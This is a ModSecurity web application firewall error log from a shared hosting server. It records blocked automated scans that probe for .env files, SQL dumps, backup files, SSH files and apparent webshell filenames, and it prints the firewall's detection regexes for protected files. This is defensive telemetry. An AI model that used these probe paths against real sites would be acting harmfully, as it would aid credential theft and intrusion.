[Tue May 26 19:53:10.795986 2026] [security2:error] [pid 86490:tid 86660] [client 74.249.173.207:4907] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-the.php"] [unique_id "ahWszlZMwN0DpLVWo6KkqQAAAK0"]
[Tue May 26 19:53:10.835556 2026] [security2:error] [pid 86490:tid 86525] [remote 18.190.7.192:54110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWszlZMwN0DpLVWo6KkpAAApSI"]
[Tue May 26 19:53:10.885667 2026] [security2:error] [pid 86490:tid 86630] [client 191.96.11.128:49356] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "earthone.me"] [uri "/backend/.env"] [unique_id "ahWszlZMwN0DpLVWo6KkrgAAAI8"]
[Tue May 26 19:53:10.933314 2026] [security2:error] [pid 86490:tid 86656] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWszlZMwN0DpLVWo6KkqAAAAKk"]
[Tue May 26 19:53:10.937984 2026] [security2:error] [pid 86490:tid 86667] [client 74.249.173.207:4905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/CDX2.php"] [unique_id "ahWszlZMwN0DpLVWo6KksgAAALQ"]
[Tue May 26 19:53:10.938073 2026] [security2:error] [pid 86490:tid 86667] [client 74.249.173.207:4905] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/CDX2.php"] [unique_id "ahWszlZMwN0DpLVWo6KksgAAALQ"]
[Tue May 26 19:53:11.021098 2026] [security2:error] [pid 86490:tid 86677] [client 191.96.11.128:49386] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWszlZMwN0DpLVWo6KkrwAAAL4"]
[Tue May 26 19:53:11.046809 2026] [security2:error] [pid 86490:tid 86651] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWszlZMwN0DpLVWo6KksQAAAKQ"]
[Tue May 26 19:53:11.209385 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:4874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/profile.php"] [unique_id "ahWsz1ZMwN0DpLVWo6KkvgAAAJ4"]
[Tue May 26 19:53:11.209508 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:4874] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/profile.php"] [unique_id "ahWsz1ZMwN0DpLVWo6KkvgAAAJ4"]
[Tue May 26 19:53:11.266986 2026] [security2:error] [pid 86490:tid 86659] [client 191.96.11.128:49372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "earthone.me"] [uri "/api/.env"] [unique_id "ahWsz1ZMwN0DpLVWo6KkwgAAAKw"]
[Tue May 26 19:53:11.300245 2026] [security2:error] [pid 86490:tid 86661] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/resources/views/.env"] [unique_id "ahWsz1ZMwN0DpLVWo6KkzQAAAK4"]
[Tue May 26 19:53:11.418854 2026] [security2:error] [pid 86490:tid 86723] [client 191.96.11.128:49406] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWsz1ZMwN0DpLVWo6KkxQAAAOw"]
[Tue May 26 19:53:11.428216 2026] [security2:error] [pid 86490:tid 86727] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWsz1ZMwN0DpLVWo6KkygAAAPA"]
[Tue May 26 19:53:11.445318 2026] [security2:error] [pid 86490:tid 86642] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWsz1ZMwN0DpLVWo6KkwQAAAJs"]
[Tue May 26 19:53:11.450786 2026] [security2:error] [pid 86490:tid 86635] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWsz1ZMwN0DpLVWo6KkywAAAJQ"]
[Tue May 26 19:53:11.475639 2026] [security2:error] [pid 86490:tid 86711] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWsz1ZMwN0DpLVWo6KkzAAAAOA"]
[Tue May 26 19:53:11.556632 2026] [security2:error] [pid 86490:tid 86657] [client 74.249.173.207:4171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ws80.php"] [unique_id "ahWsz1ZMwN0DpLVWo6Kk1QAAAKo"]
[Tue May 26 19:53:11.556819 2026] [security2:error] [pid 86490:tid 86657] [client 74.249.173.207:4171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ws80.php"] [unique_id "ahWsz1ZMwN0DpLVWo6Kk1QAAAKo"]
[Tue May 26 19:53:11.802280 2026] [security2:error] [pid 86490:tid 86686] [client 74.249.173.207:4903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a4.php"] [unique_id "ahWsz1ZMwN0DpLVWo6Kk4gAAAMc"]
[Tue May 26 19:53:11.802408 2026] [security2:error] [pid 86490:tid 86686] [client 74.249.173.207:4903] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a4.php"] [unique_id "ahWsz1ZMwN0DpLVWo6Kk4gAAAMc"]
[Tue May 26 19:53:11.946211 2026] [security2:error] [pid 86490:tid 86685] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db.php.old"] [unique_id "ahWsz1ZMwN0DpLVWo6Kk6gAAAMY"]
[Tue May 26 19:53:11.986870 2026] [security2:error] [pid 86490:tid 86631] [client 74.249.173.207:4866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahWsz1ZMwN0DpLVWo6Kk7QAAAJA"]
[Tue May 26 19:53:11.986995 2026] [security2:error] [pid 86490:tid 86631] [client 74.249.173.207:4866] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahWsz1ZMwN0DpLVWo6Kk7QAAAJA"]
[Tue May 26 19:53:12.106018 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/instagram/.env"] [unique_id "ahWs0FZMwN0DpLVWo6Kk-AAAANg"]
[Tue May 26 19:53:12.122505 2026] [security2:error] [pid 86490:tid 86734] [client 74.249.173.207:4915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/core.php"] [unique_id "ahWs0FZMwN0DpLVWo6Kk-QAAAPc"]
[Tue May 26 19:53:12.122592 2026] [security2:error] [pid 86490:tid 86734] [client 74.249.173.207:4915] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/core.php"] [unique_id "ahWs0FZMwN0DpLVWo6Kk-QAAAPc"]
[Tue May 26 19:53:12.264205 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahWs0FZMwN0DpLVWo6Kk_gAAAIo"]
[Tue May 26 19:53:12.264355 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4884] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahWs0FZMwN0DpLVWo6Kk_gAAAIo"]
[Tue May 26 19:53:12.434525 2026] [security2:error] [pid 86490:tid 86661] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/site.sql"] [unique_id "ahWs0FZMwN0DpLVWo6KlAgAAAK4"]
[Tue May 26 19:53:12.637318 2026] [security2:error] [pid 86490:tid 86639] [client 74.249.173.207:4911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/bc.php"] [unique_id "ahWs0FZMwN0DpLVWo6KlEwAAAJg"]
[Tue May 26 19:53:12.637431 2026] [security2:error] [pid 86490:tid 86639] [client 74.249.173.207:4911] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/bc.php"] [unique_id "ahWs0FZMwN0DpLVWo6KlEwAAAJg"]
[Tue May 26 19:53:12.768588 2026] [security2:error] [pid 86490:tid 86666] [client 74.249.173.207:38933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahWs0FZMwN0DpLVWo6KlIAAAALM"]
[Tue May 26 19:53:12.768713 2026] [security2:error] [pid 86490:tid 86666] [client 74.249.173.207:38933] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahWs0FZMwN0DpLVWo6KlIAAAALM"]
[Tue May 26 19:53:12.901599 2026] [security2:error] [pid 86490:tid 86669] [client 74.249.173.207:4891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xs.php"] [unique_id "ahWs0FZMwN0DpLVWo6KlKQAAALY"]
[Tue May 26 19:53:12.901702 2026] [security2:error] [pid 86490:tid 86669] [client 74.249.173.207:4891] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xs.php"] [unique_id "ahWs0FZMwN0DpLVWo6KlKQAAALY"]
[Tue May 26 19:53:12.940306 2026] [security2:error] [pid 86490:tid 86638] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mybackend/.env"] [unique_id "ahWs0FZMwN0DpLVWo6KlLQAAAJc"]
[Tue May 26 19:53:13.036846 2026] [security2:error] [pid 86490:tid 86729] [client 74.249.173.207:4898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xxa.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlLgAAAPI"]
[Tue May 26 19:53:13.036943 2026] [security2:error] [pid 86490:tid 86729] [client 74.249.173.207:4898] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xxa.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlLgAAAPI"]
[Tue May 26 19:53:13.039515 2026] [security2:error] [pid 86490:tid 86737] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs0FZMwN0DpLVWo6KlDQAAAPo"]
[Tue May 26 19:53:13.108801 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.ssh/known_hosts.bak"] [unique_id "ahWs0VZMwN0DpLVWo6KlMgAAANY"]
[Tue May 26 19:53:13.182841 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:4873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/index0.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlMwAAAJ4"]
[Tue May 26 19:53:13.182956 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:4873] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/index0.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlMwAAAJ4"]
[Tue May 26 19:53:13.277548 2026] [security2:error] [pid 86490:tid 86654] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/public/default.bak"] [unique_id "ahWs0VZMwN0DpLVWo6KlNwAAAKc"]
[Tue May 26 19:53:13.370927 2026] [security2:error] [pid 86490:tid 86661] [client 74.249.173.207:4880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-kz.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlOwAAAK4"]
[Tue May 26 19:53:13.371040 2026] [security2:error] [pid 86490:tid 86661] [client 74.249.173.207:4880] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-kz.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlOwAAAK4"]
[Tue May 26 19:53:13.626239 2026] [security2:error] [pid 86490:tid 86743] [client 74.249.173.207:38937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/19.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlQAAAAQA"]
[Tue May 26 19:53:13.626342 2026] [security2:error] [pid 86490:tid 86743] [client 74.249.173.207:38937] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/19.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlQAAAAQA"]
[Tue May 26 19:53:13.754028 2026] [security2:error] [pid 86490:tid 86657] [client 74.249.173.207:4165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlSgAAAKo"]
[Tue May 26 19:53:13.754116 2026] [security2:error] [pid 86490:tid 86657] [client 74.249.173.207:4165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlSgAAAKo"]
[Tue May 26 19:53:13.965522 2026] [security2:error] [pid 86490:tid 86699] [client 74.249.173.207:4206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlUQAAANQ"]
[Tue May 26 19:53:13.965634 2026] [security2:error] [pid 86490:tid 86699] [client 74.249.173.207:4206] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahWs0VZMwN0DpLVWo6KlUQAAANQ"]
[Tue May 26 19:53:14.131772 2026] [security2:error] [pid 86490:tid 86641] [client 74.249.173.207:4181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ws78.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlVwAAAJo"]
[Tue May 26 19:53:14.131893 2026] [security2:error] [pid 86490:tid 86641] [client 74.249.173.207:4181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ws78.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlVwAAAJo"]
[Tue May 26 19:53:14.299427 2026] [security2:error] [pid 86490:tid 86656] [client 74.249.173.207:4163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlZAAAAKk"]
[Tue May 26 19:53:14.299525 2026] [security2:error] [pid 86490:tid 86656] [client 74.249.173.207:4163] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlZAAAAKk"]
[Tue May 26 19:53:14.450649 2026] [security2:error] [pid 86490:tid 86718] [client 74.249.173.207:4195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlZgAAAOc"]
[Tue May 26 19:53:14.450822 2026] [security2:error] [pid 86490:tid 86718] [client 74.249.173.207:4195] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlZgAAAOc"]
